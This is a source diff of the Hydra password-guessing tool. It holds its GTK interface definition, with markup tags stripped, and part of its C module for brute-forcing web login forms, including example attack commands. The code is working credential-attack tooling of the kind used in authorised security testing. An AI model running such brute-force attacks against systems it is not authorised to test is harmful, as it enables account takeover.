+ + tab + + + + + + True + False + 0 + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + 2 + 2 + False + 0 + 0 + + + + True + File with user logins, one entry per line + True + True + True + 0 + + True + * + False + + + + 1 + 2 + 1 + 2 + expand|shrink + expand|shrink + + + + + + True + The login to use + True + True + True + 0 + yourname + True + * + False + + + 1 + 2 + 0 + 1 + expand|shrink + expand|shrink + + + + + + True + True + Username + True + GTK_RELIEF_NORMAL + True + True + False + True + + + 0 + 1 + 0 + 1 + expand|shrink + expand|shrink + + + + + + True + True + Username List + True + GTK_RELIEF_NORMAL + True + False + False + True + radioUsername1 + + + 0 + 1 + 1 + 2 + expand|shrink + expand|shrink + + + + + + + + True + Username + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + 2 + 2 + False + 0 + 0 + + + + True + File with passwords to try, one entry per line + True + True + True + 0 + + True + * + False + + + + 1 + 2 + 1 + 2 + expand|shrink + expand|shrink + + + + + + True + The password to try + True + True + True + 0 + yourpass + True + * + False + + + 1 + 2 + 0 + 1 + expand|shrink + expand|shrink + + + + + + True + True + Password + True + GTK_RELIEF_NORMAL + True + True + False + True + + + 0 + 1 + 0 + 1 + expand|shrink + expand|shrink + + + + + + True + True + Password List + True + GTK_RELIEF_NORMAL + True + False + False + True + radioPass1 + + + 0 + 1 + 1 + 2 + expand|shrink + expand|shrink + + + + + + + + True + Password + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + 1 + 2 + False + 0 + 0 + + + + True + "Enable this option to use a colon file for login/password attempts + True + Use Colon separated file + True + GTK_RELIEF_NORMAL + True + False + False + True + + + + 0 + 1 + 0 + 1 + expand|shrink + expand + + + + + + True + The colon file to use, each line has to be structured like "mylogin:mypass" + True + True + True + 0 + + True + * + False + + + + 1 + 2 + 0 + 1 + expand|shrink + expand + + + + + + + + True + Colon separated file + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 1 + 2 + False + 0 + 0 + + + + True + Enable this option to try the login as password, in addition to the password/file + True + Try login as password + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + 1 + 0 + 1 + expand|shrink + expand + + + + + + True + Enable this option to try an empty password, in addition to the password/file + True + Try empty password + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 1 + 2 + 0 + 1 + expand|shrink + expand + + + + + 0 + True + True + + + + + False + True + + + + + + True + Passwords + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + tab + + + + + + True + 2 + 1 + False + 0 + 0 + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + 5 + 2 + False + 0 + 0 + + + + True + Proxy + False + False + GTK_JUSTIFY_LEFT + False + False + 0 + 0.5 + 0 + 0 + + + 0 + 1 + 1 + 2 + expand|shrink + expand + + + + + + True + The address of the proxy. Syntax: "http://123.45.67.89:8080" + True + True + True + 0 + http://127.0.0.1:8080 + True + * + False + + + 1 + 2 + 1 + 2 + expand|shrink + expand + + + + + + True + Enable this if the proxy requires authenticatio + True + Proxy needs authentication + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + 1 + 2 + 3 + expand|shrink + expand + + + + + + True + Username + False + False + GTK_JUSTIFY_LEFT + False + False + 0 + 0.5 + 0 + 0 + + + 0 + 1 + 3 + 4 + expand|shrink + expand + + + + + + True + The user name for proxy authentication + True + True + True + 0 + yourname + True + * + False + + + 1 + 2 + 3 + 4 + expand|shrink + expand + + + + + + True + Password + False + False + GTK_JUSTIFY_LEFT + False + False + 0 + 0.5 + 0 + 0 + + + 0 + 1 + 4 + 5 + expand|shrink + expand + + + + + + True + The password for proxy authentication + True + True + True + 0 + yourpass + True + * + False + + + 1 + 2 + 4 + 5 + expand|shrink + expand + + + + + + True + + False + False + GTK_JUSTIFY_LEFT + False + False + 0 + 0.5 + 0 + 0 + + + 1 + 2 + 2 + 3 + fill + + + + + + + True + False + 0 + + + + True + True + No Proxy + True + GTK_RELIEF_NORMAL + True + True + False + True + + + 0 + True + True + + + + + + True + Enable this to use a proxy for scanning ( Only for HTTP Module ) + True + HTTP Method + True + GTK_RELIEF_NORMAL + True + False + False + True + radioProxy + + + 0 + True + True + + + + + + True + Enable this to use a proxy for scanning + True + CONNECT Method + True + GTK_RELIEF_NORMAL + True + False + False + True + radioProxy + + + 0 + True + True + + + + + 0 + 2 + 0 + 1 + expand|shrink|fill + + + + + + + + True + Use a HTTP/HTTPS Proxy + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + 1 + 1 + 2 + expand|shrink|fill + expand|shrink|fill + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + 3 + 2 + False + 0 + 0 + + + + True + Enable this to stop all attacking processes once a valid login/password pair is found + True + Exit after first found pair + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + 2 + 2 + 3 + expand|shrink + expand + + + + + + True + The maximum timeout an attack process is waiting for a response from the target + True + 1 + 0 + False + GTK_UPDATE_ALWAYS + False + False + 30 0 100 1 10 10 + + + 1 + 2 + 1 + 2 + expand|shrink + expand + + + + + + True + The number of attack tasks to run in parallel. The more the faster, the most: computer lockup :-) 16-64 is a good choice + True + 1 + 0 + False + GTK_UPDATE_ALWAYS + False + False + 40 0 100 1 10 10 + + + 1 + 2 + 0 + 1 + expand|shrink + expand + + + + + + True + Timeout + False + False + GTK_JUSTIFY_LEFT + False + False + 0 + 0.5 + 0 + 0 + + + 0 + 1 + 1 + 2 + expand|shrink + expand + + + + + + True + Number of Tasks + False + False + GTK_JUSTIFY_LEFT + False + False + 0 + 0.5 + 0 + 0 + + + 0 + 1 + 0 + 1 + expand|shrink + expand + + + + + + + + True + Performance Options + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + 1 + 0 + 1 + fill + + + + + False + True + + + + + + True + Tuning + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + tab + + + + + + True + False + 0 + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + URL to connect to via the proxy + True + True + True + 0 + www.suse.com + True + * + False + + + + + + True + http-proxy module + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + The protected URL you want to access + True + True + True + 0 + /foo/bar/protected.html + True + * + False + + + + + + True + http / https url + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + The password to the cisco device + True + True + True + 0 + password + True + * + False + + + + + + True + Cisco Enable, Login for Cisco device + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + The DN scope of ldap to authenticate against + True + True + True + 0 + dn-scope + True + * + False + + + + + + True + LDAP DN + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + False + 0 + + + + True + Just attack local accounts + True + local accounts + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + True + True + + + + + + True + Attack domain and local accounts + True + domain accounts + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + True + True + + + + + + True + Interpret passes as NTML hashes + True + Interpret passes as NTLM hashes + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + False + False + + + + + + + + True + SMBNT + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + The client id you want to attack, something between 0 and 99 + True + 1 + 0 + False + GTK_UPDATE_ALWAYS + False + False + 1 0 99 1 10 10 + + + + + + True + sapr3 client id + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + Directory of the CVS repository + True + True + True + 0 + /hydra-gtk + True + * + False + + + + + + True + CVS/SVN Repository + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + 0.5 + 0.5 + 1 + 1 + 0 + 0 + 0 + 0 + + + + True + Insert the return string for a succesfull login + True + True + True + 0 + + True + * + False + + + + + + + + True + Telnet - Successful Login String + False + True + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + 2 + 2 + False + 0 + 0 + + + + True + True + Write Password + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 1 + 2 + 0 + 1 + expand|shrink + expand + + + + + + True + True + Read Password + True + GTK_RELIEF_NORMAL + True + False + False + True + radioSNMPRead + + + 1 + 2 + 1 + 2 + expand|shrink + expand + + + + + + True + True + Version 2 + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + 1 + 1 + 2 + expand|shrink + expand + + + + + + True + True + Version 1 + True + GTK_RELIEF_NORMAL + True + False + False + True + radioSNMPVer2 + + + 0 + 1 + 0 + 1 + expand|shrink + expand + + + + + + + + True + SNMP + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + False + True + + + + + + True + Specific + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + tab + + + + + + True + False + 0 + + + + True + True + GTK_POLICY_AUTOMATIC + GTK_POLICY_AUTOMATIC + GTK_SHADOW_NONE + GTK_CORNER_TOP_LEFT + + + + True + GTK_SHADOW_IN + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + True + False + False + True + GTK_JUSTIFY_LEFT + GTK_WRAP_NONE + True + 0 + 0 + 0 + 0 + 0 + 0 + + + + + + + True + Output + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + + + + + 0 + True + True + + + + + + True + False + 0 + + + + True + start hydra + True + Start + True + GTK_RELIEF_NORMAL + True + + + + 0 + True + False + + + + + + True + stop hydra + True + Stop + True + GTK_RELIEF_NORMAL + True + + + + 0 + True + False + + + + + + True + save output + True + Save Output + True + GTK_RELIEF_NORMAL + True + + + + 0 + True + False + + + + + + True + clear screen + True + Clear Output + True + GTK_RELIEF_NORMAL + True + + + + 0 + True + False + + + + + 0 + False + True + + + + + False + True + + + + + + True + Start + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + tab + + + + + 0 + True + True + + + + + + True + True + + + 0 + False + False + + + + + + + diff --git a/hydra-gtk/xhydra.gladep b/hydra-gtk/xhydra.gladep new file mode 100755 index 0000000..8811dd2 --- /dev/null +++ b/hydra-gtk/xhydra.gladep @@ -0,0 +1,10 @@ + + + + + Hydra_gtk + xhydra + FALSE + FALSE + TRUE + diff --git a/hydra-http-form.c b/hydra-http-form.c new file mode 100644 index 0000000..20bcb3a --- /dev/null +++ b/hydra-http-form.c @@ -0,0 +1,691 @@ + +/* + +Hydra Form Module +----------------- + +The hydra form can be used to carry out a brute-force attack on simple +web-based login forms that require username and password variables via +either a GET or POST request. + +The module works similarly to the HTTP basic auth module and will honour +proxy mode (with authenticaion) as well as SSL. The module can be invoked +with the service names of "http-get-form", "http-post-form", +"https-get-form" and "https-post-form". + +Here's a couple of examples: - + +./hydra -l "" -P pass.txt 10.221.64.12 http-post-form +"/irmlab2/testsso-auth.do:ID=^USER^&Password=^PASS^:Invalid Password" + +./hydra -S -s 443 -l "" -P pass.txt 10.221.64.2 https-get-form +"/irmlab1/vulnapp.php:username=^USER^&pass=^PASS^:incorrect" + +The option field (following the service field) takes three ":" separated +values and an optional fourth value, the first is the page on the server +to GET or POST to, the second is the POST/GET variables (taken from either +the browser, or a proxy such as PAROS) with the varying usernames and passwords +in the "^USER^" and "^PASS^" placeholders, the third is the string that it +checks for an *invalid* or *valid* login - any exception to this is counted +as a success. +So please: + * invalid condition login should be preceded by "F=" + * valid condition login should be preceded by "S=". +By default, if no header is found the condition is assume to be a fail, +so checking for *invalid* login. +The fourth optional value, can be a 'C' to define a different page to GET +initial cookies from. + +If you specify the verbose flag (-v) it will show you the response from the +HTTP server which is useful for checking the result of a failed login to +find something to pattern match against. + +Module initially written by Phil Robinson, IRM Plc (releases@irmplc.com), +rewritten by David Maciejak + +Fix and issue with strtok use and implement 1 step location follow if HTTP +3xx code is returned (david dot maciejak at gmail dot com) + +Added fail or success condition, getting cookies, and allow 5 redirections by david + +*/ + +#include "hydra-mod.h" + +extern char *HYDRA_EXIT; +char *buf; +char *cond; + +int success_cond = 0; +int getcookie = 1; +int auth_flag = 0; + +char redirected_url_buff[2048] = ""; +int redirected_flag = 0; + +#define MAX_REDIRECT 8 +int redirected_cpt = MAX_REDIRECT; +char cookie[4096] = "", cmiscptr[1024]; + +extern char *webtarget; +extern char *slash; +int webport, freemischttpform = 0; +char bufferurl[1024], cookieurl[1024] = "", userheader[1024] = "", *url, *variables, *optional1; + +int strpos(char *str, char *target) { + char *res = strstr(str, target); + + if (res == NULL) + return -1; + else + return res - str; +} + +char *html_encode(char *string) { + char *ret = string; + + if (ret == NULL) + return NULL; + + if (index(ret, '%') != NULL) + ret = hydra_strrep(ret, "%", "%25"); + if (index(ret, ' ') != NULL) + ret = hydra_strrep(ret, " ", "%20"); + if (index(ret, '&') != NULL) + ret = hydra_strrep(ret, "&", "%26"); + if (index(ret, '#') != NULL) + ret = hydra_strrep(ret, "&", "%23"); + + return ret; +} + + +/* +int analyze_server_response(int socket) +return 0 or 1 when the cond regex is matched +return -1 if no response from server +*/ +int analyze_server_response(int s) { + int runs = 0; + + while ((buf = hydra_receive_line(s)) != NULL) { + runs++; + //check for http redirection + if (strstr(buf, "HTTP/1.1 3") != NULL || strstr(buf, "HTTP/1.0 3") != NULL || strstr(buf, "Status: 3") != NULL) { + redirected_flag = 1; + } else if (strstr(buf, "HTTP/1.1 401") != NULL || strstr(buf, "HTTP/1.0 401") != NULL) { + auth_flag = 1; + } else if ((strstr(buf, "HTTP/1.1 403") != NULL) || (strstr(buf, "HTTP/1.1 404") != NULL) || (strstr(buf, "HTTP/1.0 403") != NULL) || (strstr(buf, "HTTP/1.0 404") != NULL)) { + return 0; + } + + if (hydra_strcasestr(buf, "Location: ") != NULL) { + char *startloc, *endloc; + char str[2048]; + + startloc = hydra_strcasestr(buf, "Location: ") + strlen("Location: "); + strncpy(str, startloc, sizeof(str) - 1); + str[sizeof(str) - 1] = 0; + endloc = strchr(str, '\n'); + if (endloc != NULL) + *endloc = 0; + endloc = strchr(str, '\r'); + if (endloc != NULL) + *endloc = 0; + strcpy(redirected_url_buff, str); + } + //there can be multiple cookies + if (hydra_strcasestr(buf, "Set-Cookie: ") != NULL) { + char *cookiebuf = buf; + + do { + char *startcookie, *endcookie1, *endcookie2; + char str[1024], tmpcookie[4096] = "", tmpname[128] = "", *ptr, *ptr2; + + memset(str, 0, sizeof(str)); + startcookie = hydra_strcasestr(cookiebuf, "Set-Cookie: ") + strlen("Set-Cookie: "); + strncpy(str, startcookie, sizeof(str) - 1); + str[sizeof(str) - 1] = 0; + endcookie1 = strchr(str, '\n'); + endcookie2 = strchr(str, ';'); + //terminate string after cookie data + if (endcookie1 != NULL && endcookie1 < endcookie2) + *endcookie1 = 0; + else if (endcookie2 != NULL) + *endcookie2 = 0; + // is the cookie already there? if yes, remove it! + if (index(startcookie, '=') != NULL && (ptr = index(startcookie, '=')) - startcookie + 1 <= sizeof(tmpname)) { + strncpy(tmpname, startcookie, sizeof(tmpname) - 2); + tmpname[sizeof(tmpname) - 2] = 0; + ptr = index(tmpname, '='); + *(++ptr) = 0; + // is the cookie already in the cookiejar? (so, does it have to be replaced?) + if ((ptr = hydra_strcasestr(cookie, tmpname)) != NULL) { + // yes it is. + // if the cookie is not in the beginning of the cookiejar, copy the ones before + if (ptr != cookie && *(ptr - 1) == ' ') { + strncpy(tmpcookie, cookie, ptr - cookie - 2); + tmpcookie[ptr - cookie - 2] = 0; + } + ptr += strlen(tmpname); + // if there are any cookies after this one in the cookiejar, copy them over + if ((ptr2 = strstr(ptr, "; ")) != NULL) { + ptr2 += 2; + strncat(tmpcookie, ptr2, sizeof(tmpcookie) - strlen(tmpcookie) - 1); + } + if (debug) + printf("[DEBUG] removing cookie %s in jar\n before: %s\n after: %s\n", tmpname, cookie, tmpcookie); + strcpy(cookie, tmpcookie); + } + } + ptr = index(str, '='); + // only copy the cookie if it has a value (otherwise the server wants to delete the cookie + if (ptr != NULL && *(ptr + 1) != ';' && *(ptr + 1) != 0 && *(ptr + 1) != '\n' && *(ptr + 1) != '\r') { + if (strlen(cookie) > 0) + strncat(cookie, "; ", sizeof(cookie) - strlen(cookie) - 1); + strncat(cookie, str, sizeof(cookie) - strlen(cookie) - 1); + } + cookiebuf = startcookie; + } while (hydra_strcasestr(cookiebuf, "Set-Cookie: ") != NULL); + } +#ifdef HAVE_PCRE + if (hydra_string_match(buf, cond) == 1) { +#else + if (strstr(buf, cond) != NULL) { +#endif + free(buf); +// printf("DEBUG: STRING %s FOUND!!:\n%s\n", cond, buf); + return 1; + } +// else printf("DEBUG: STRING %s NOT FOUND:\n%s\n", cond, buf); + free(buf); + } + if (runs == 0) { + if (debug) + hydra_report(stderr, "DEBUG: no response from server\n"); + return -1; + } + return 0; +} + +void hydra_reconnect(int s, char *ip, int port, unsigned char options) { + if (s >= 0) + s = hydra_disconnect(s); + if ((options & OPTION_SSL) == 0) { + s = hydra_connect_tcp(ip, port); + } else { + s = hydra_connect_ssl(ip, port); + } +} + +int start_http_form(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp, char *type) { + char *empty = ""; + char *login, *pass, buffer[9000], clogin[256], cpass[256]; + char header[8096], *upd3variables, cuserheader[1024]; + int found = !success_cond, i, j; + + memset(header, 0, sizeof(header)); + cookie[0] = 0; // reset cookies from potential previous attempt + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + strncpy(clogin, html_encode(login), sizeof(clogin) - 1); + clogin[sizeof(clogin) - 1] = 0; + strncpy(cpass, html_encode(pass), sizeof(cpass) - 1); + cpass[sizeof(cpass) - 1] = 0; + upd3variables = hydra_strrep(variables, "^USER^", clogin); + upd3variables = hydra_strrep(upd3variables, "^PASS^", cpass); + if (strstr(userheader, "^USER^") == NULL && strstr(userheader, "^PASS^") == NULL) { + strcpy(cuserheader, userheader); + } else { // we use the encoded version + strncpy(cuserheader, hydra_strrep(userheader, "^USER^", clogin), sizeof(cuserheader) - 1); + cuserheader[sizeof(cuserheader) - 1] = 0; + strncpy(cuserheader, hydra_strrep(cuserheader, "^PASS^", cpass), sizeof(cuserheader) - 1); + cuserheader[sizeof(cuserheader) - 1] = 0; + } + + /* again: no snprintf to be portable. dont worry, buffer cant overflow */ + if (use_proxy == 1 && proxy_authentication != NULL) { + // proxy with authentication + if (getcookie) { + //doing a GET to save cookies + sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla 5.0 (Hydra Proxy Auth)\r\n%s%s\r\n", + webtarget, webport, cookieurl, webtarget, proxy_authentication, header, cuserheader); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + i = analyze_server_response(s); // return value ignored + if (strlen(cookie) > 0) { + sprintf(header, "Cookie: %s\r\n", cookie); + } + hydra_reconnect(s, ip, port, options); + } + + if (strcmp(type, "POST") == 0) { + sprintf(buffer, + "POST http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/5.0 (Hydra Proxy Auth)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n%s%s\r\n%s", + webtarget, webport, url, webtarget, proxy_authentication, (int) strlen(upd3variables), header, cuserheader, upd3variables); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + } else { + sprintf(buffer, + "GET http://%s:%d%.600s?%s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/5.0 (Hydra Proxy Auth)\r\n%s%s\r\n", + webtarget, webport, url, upd3variables, webtarget, proxy_authentication, header, cuserheader); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + } + } else { + if (use_proxy == 1) { + // proxy without authentication + if (getcookie) { + //doing a GET to get cookies + sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra Proxy)\r\n%s%s\r\n", webtarget, webport, cookieurl, webtarget, header, + cuserheader); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + i = analyze_server_response(s); // ignore result + if (strlen(cookie) > 0) { + sprintf(header, "Cookie: %s\r\n", cookie); + } + hydra_reconnect(s, ip, port, options); + } + + if (strcmp(type, "POST") == 0) { + sprintf(buffer, + "POST http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n%s%s\r\n%s", + webtarget, webport, url, webtarget, (int) strlen(upd3variables), header, cuserheader, upd3variables); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + } else { + sprintf(buffer, "GET http://%s:%d%.600s?%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\n%s%s\r\n", webtarget, webport, url, upd3variables, webtarget, + header, cuserheader); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + } + } else { + // direct web server, no proxy + if (getcookie) { + //doing a GET to save cookies + sprintf(buffer, "GET %.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\n%s\r\n", cookieurl, webtarget, cuserheader); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + i = analyze_server_response(s); // ignore result + if (strlen(cookie) > 0) { + sprintf(header, "Cookie: %s\r\n", cookie); + } + hydra_reconnect(s, ip, port, options); + } + + if (strcmp(type, "POST") == 0) { + sprintf(buffer, + "POST %.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n%s%s\r\n%s", + url, webtarget, (int) strlen(upd3variables), header, cuserheader, upd3variables); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + } else { + sprintf(buffer, "GET %.600s?%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\n%s%s\r\n", url, upd3variables, webtarget, header, cuserheader); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + } + } + } + + found = analyze_server_response(s); + if (auth_flag) { // we received a 401 error - user using wrong module + hydra_report(stderr, "[ERROR] the target is using HTTP auth, not a web form, received HTTP error code 401. Use module \"http%s-get\" instead.\n", + (options & OPTION_SSL) > 0 ? "s" : ""); + return 4; + } + if (strlen(cookie) > 0) { + sprintf(header, "Cookie: %.1000s\r\n", cookie); + } + //if page was redirected, follow the location header + redirected_cpt = MAX_REDIRECT; + if (debug) + printf("[DEBUG] attempt result: found %d, redirect %d, location: %s\n", found, redirected_flag, redirected_url_buff); + while (found == 0 && redirected_flag && (redirected_url_buff[0] != 0) && (redirected_cpt > 0)) { + //we have to split the location + char *startloc, *endloc; + char str[2048]; + char str2[2048]; + char str3[2048]; + + redirected_cpt--; + redirected_flag = 0; + //check if the redirect page contains the fail/success condition +#ifdef HAVE_PCRE + if (hydra_string_match(redirected_url_buff, cond) == 1) { +#else + if (strstr(redirected_url_buff, cond) != NULL) { +#endif + found = success_cond; + } else { + //location could be either absolute http(s):// or / something + //or relative + startloc = strstr(redirected_url_buff, "://"); + if (startloc != NULL) { + startloc += strlen("://"); + + if ((endloc = strchr(startloc, '\r')) != NULL) { + startloc[endloc - startloc] = 0; + } + if ((endloc = strchr(startloc, '\n')) != NULL) { + startloc[endloc - startloc] = 0; + } + strcpy(str, startloc); + + endloc = strchr(str, '/'); + if (endloc != NULL) { + strncpy(str2, str, endloc - str); + str2[endloc - str] = 0; + } else + strncpy(str2, str, sizeof(str)); + + if (strlen(str) - strlen(str2) == 0) { + strcpy(str3, "/"); + } else { + strncpy(str3, str + strlen(str2), strlen(str) - strlen(str2) - 1); + str3[strlen(str) - strlen(str2) - 1] = 0; + } + } else { + strncpy(str2, webtarget, sizeof(str2)); + if (redirected_url_buff[0] != '/') { + //it's a relative path, so we have to concatenate it + //with the path from the first url given + char *urlpath; + char urlpath_extracted[2048]; + + memset(urlpath_extracted, 0, sizeof(urlpath_extracted)); + + urlpath = strrchr(url, '/'); + if (urlpath != NULL) { + strncpy(urlpath_extracted, url, urlpath - url); + sprintf(str3, "%.1000s/%.1000s", urlpath_extracted, redirected_url_buff); + } else { + sprintf(str3, "%.1000s/%.1000s", url, redirected_url_buff); + } + } else + strncpy(str3, redirected_url_buff, sizeof(str3)); + if (debug) + hydra_report(stderr, "[DEBUG] host=%s redirect=%s origin=%s\n", str2, str3, url); + } + if (str3[0] != '/') { + j = strlen(str3); + str3[j + 1] = 0; + for (i = j; i > 0; i--) + str3[i] = str3[i - 1]; + str3[0] = '/'; + } + + if (verbose) + hydra_report(stderr, "[VERBOSE] Page redirected to http://%s%s\n", str2, str3); + + //re-use the code above to check for proxy use + if (use_proxy == 1 && proxy_authentication != NULL) { + // proxy with authentication + sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", + webtarget, webport, str3, str2, proxy_authentication, header); + } else { + if (use_proxy == 1) { + // proxy without authentication + sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", webtarget, webport, str3, str2, header); + } else { + //direct web server, no proxy + sprintf(buffer, "GET %.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", str3, str2, header); + } + } + + hydra_reconnect(s, ip, port, options); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + found = analyze_server_response(s); + if (strlen(cookie) > 0) { + sprintf(header, "Cookie: %s\r\n", cookie); + } + } + } + + //if the last status is still 3xx, set it as a false + if (found != -1 && found == success_cond && redirected_flag == 0 && redirected_cpt >= 0) { + hydra_report_found_host(port, ip, "www-form", fp); + hydra_completed_pair_found(); + } else { + hydra_completed_pair(); + } + return 1; +} + +void service_http_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, char *type) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_HTTP, mysslport = PORT_HTTP_SSL; + char *ptr, *ptr2; + + hydra_register_socket(sp); + + if (webtarget != NULL && (webtarget = strstr(miscptr, "://")) != NULL) { + webtarget += strlen("://"); + if ((ptr2 = index(webtarget, ':')) != NULL) { /* step over port if present */ + *ptr2 = 0; + ptr2++; + ptr = ptr2; + if (*ptr == '/' || (ptr = index(ptr2, '/')) != NULL) + miscptr = ptr; + else + miscptr = slash; /* to make things easier to user */ + } else if ((ptr2 = index(webtarget, '/')) != NULL) { + if (freemischttpform == 0) { + freemischttpform = 1; + miscptr = malloc(strlen(ptr2) + 1); + strcpy(miscptr, ptr2); + *ptr2 = 0; + } + } else + webtarget = NULL; + } + if (cmdlinetarget != NULL && webtarget == NULL) + webtarget = cmdlinetarget; + else if (webtarget == NULL && cmdlinetarget == NULL) + webtarget = hydra_address2string(ip); + if (port != 0) + webport = port; + else if ((options & OPTION_SSL) == 0) + webport = myport; + else + webport = mysslport; + + sprintf(bufferurl, "%.1000s", miscptr); + url = bufferurl; + ptr = url; + while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\')) + ptr++; + if (*ptr != 0) + *ptr++ = 0; + variables = ptr; + while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\')) + ptr++; + if (*ptr != 0) + *ptr++ = 0; + cond = ptr; + while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\')) + ptr++; + if (*ptr != 0) + *ptr++ = 0; + optional1 = ptr; + if (strstr(url, "\\:") != NULL) { + if ((ptr = malloc(strlen(url))) != NULL) { // no need for +1 + strcpy(ptr, hydra_strrep(url, "\\:", ":")); + url = ptr; + } + } + if (strstr(variables, "\\:") != NULL) { + if ((ptr = malloc(strlen(variables))) != NULL) { // no need for +1 + strcpy(ptr, hydra_strrep(variables, "\\:", ":")); + variables = 